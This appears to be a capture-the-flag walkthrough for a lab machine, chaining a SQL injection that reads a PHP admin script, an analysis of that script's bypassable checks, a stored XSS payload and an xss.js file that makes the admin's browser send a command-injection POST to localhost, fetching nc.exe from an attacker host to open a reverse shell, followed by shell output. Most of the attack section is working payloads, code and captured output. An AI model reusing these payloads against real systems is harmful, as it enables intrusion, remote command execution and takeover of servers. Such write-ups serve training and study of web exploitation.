3 admin backdoorchecker.php

# submitting any command through the form returns this error:
ERROR:
It's only allowed to access this function from localhost (::1).<br> This is due to the recent hack attempts on our server.

# file being requested is 
/admin/backdoorchecker.php

# read its source through the existing SQLi: MySQL load_file() (needs the FILE privilege and a permissive secure_file_priv — it worked here), wrapped in TO_BASE64 so the PHP source survives the result column intact.
1' UNION SELECT 1,TO_BASE64(load_file('C:\\xampp\\htdocs\\admin\\backdoorchecker.php')),3; -- -

# decoded b64
<?php
// Vulnerable "backdoor checker": reads a username/password pair from cookies,
// compares them to hard-coded credentials, then passes $_POST['cmd'] to
// system() if it survives a two-character blacklist, a prefix check and a
// REMOTE_ADDR check. Every one of those controls is bypassable (see below).
include('../link.php');
include('auth.php');

// Credentials travel in cookies as reversible base64, not a session token.
// $_COOKIE is already URL-decoded by PHP, so urldecode() here is a second decode.
$username = base64_decode(urldecode($_COOKIE['username']));
$password = base64_decode(urldecode($_COOKIE['password']));
// Blacklist covers only "$(" and "&". "|" is not listed, so "dir|<anything>"
// passes straight through (and ";" / backticks would on a POSIX shell).
$bad 	  = array('$(','&');
$good 	  = "ls";

// Required command prefix: "ls" on POSIX, "dir" on Windows.
if(strtolower(substr(PHP_OS,0,3)) == "win"){
	$good = "dir";
}

// Hard-coded plaintext password compared with "==" (not password_verify()/hash_equals()).
if($username == "admin" && $password == "Hopelessromantic"){
	if(isset($_POST['cmd'])){
			// Reject the command if it contains any blacklisted substring.
			// Each die()/echo below uses a distinct message, so a caller can tell
			// apart "bad credentials", "blacklist hit", "wrong prefix" and "wrong source IP".
			foreach($bad as $char){
				if(strpos($_POST['cmd'],$char) !== false){
					die("You're not allowed to do that.");
				}
			}
			// Only the first strlen($good) bytes are checked; everything after the
			// prefix is unconstrained.
			if(substr($_POST['cmd'], 0,strlen($good)) != $good){
				die("It's only allowed to use the $good command");
			}

			// Source check is on REMOTE_ADDR only and only for IPv6 "::1" (127.0.0.1
			// would fail). Any request that originates on the host satisfies it —
			// including one a browser on the server is made to send via XSS/CSRF.
			if($_SERVER['REMOTE_ADDR'] == "::1"){
				// OS command injection: user-controlled string handed to the shell
				// unescaped (no escapeshellarg(), no argument-array exec).
				system($_POST['cmd']);
			} else{
				echo "It's only allowed to access this function from localhost (::1).<br> This is due to the recent hack attempts on our server.";
			}
	}
} else{
	echo "You are not allowed to use this function!";
}
?>

# notes:
1. credentials come from the base64 "username"/"password" cookies and must equal admin:Hopelessromantic
2. blacklist is only $( and & — | is not filtered (nor ; or backticks on a POSIX shell)
3. the command must START with ls (dir on Windows); nothing after the prefix is checked
4. system() only runs when REMOTE_ADDR is exactly ::1, i.e. the request must originate on the server itself
5. so "dir|<anything>" POSTed from localhost with the admin cookies is arbitrary command execution

# The REMOTE_ADDR check is satisfied by any request that originates on the server, including one a browser on that host is made to send. The earlier XSS runs in the admin's browser — which, judging by the shell coming back from 10.10.10.154, is on the target — so it can POST to localhost with the admin's cookies attached automatically.

<script src="http://10.10.16.7/xss.js"> </script>

$ cat xss.js
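// Runs inside the admin's browser via the XSS payload. The target compares
// $_SERVER['REMOTE_ADDR'] to "::1", so the POST has to originate on the server;
// a same-origin XHR to localhost does that, and the browser attaches the
// admin's own username/password cookies itself (presumably already set for
// that origin — they are what the PHP checks).
var request = new XMLHttpRequest();
var uri = 'http://localhost/admin/backdoorchecker.php'
// "dir" satisfies the prefix check; "|" is not in the blacklist ($( and &),
// so everything after the pipe reaches system() unchanged.
var params = 'cmd=dir|//10.10.16.7/drive/nc.exe -e cmd.exe 10.10.16.7 6969';
request.open('POST', uri, true);
request.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
// No hand-built Cookie header: "Cookie" is a forbidden request-header name and
// setRequestHeader() silently drops it, so setting one here would be a no-op.
request.send(params);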

# submit the payload in a comment so the XSS fires when the admin views it
<script src='http://10.10.16.7/xss.js'> </script>

# serve nc.exe from an SMB share named "drive" on 10.10.16.7 (the payload references //10.10.16.7/drive/nc.exe) and start the listener on 6969
$ nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.154] 51127
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. Alle rechten voorbehouden.

C:\xampp\htdocs\admin>whoami
bankrobber\cortin

C:\xampp\htdocs\admin>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                           State
============================= ===================================== ========
SeShutdownPrivilege           Systeem afsluiten                     Disabled
SeChangeNotifyPrivilege       Controle op bladeren negeren          Enabled
SeUndockPrivilege             Computer uit basisstation verwijderen Disabled
SeIncreaseWorkingSetPrivilege Een proceswerkset vergroten           Disabled
SeTimeZonePrivilege           Tijdzone wijzigen                     Disabled

C:\xampp\htdocs\admin>systeminfo
Host Name:                 BANKROBBER
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.14393 N/A Build 14393
System Type:               x64-based PC
Hotfix(s):                 N/A
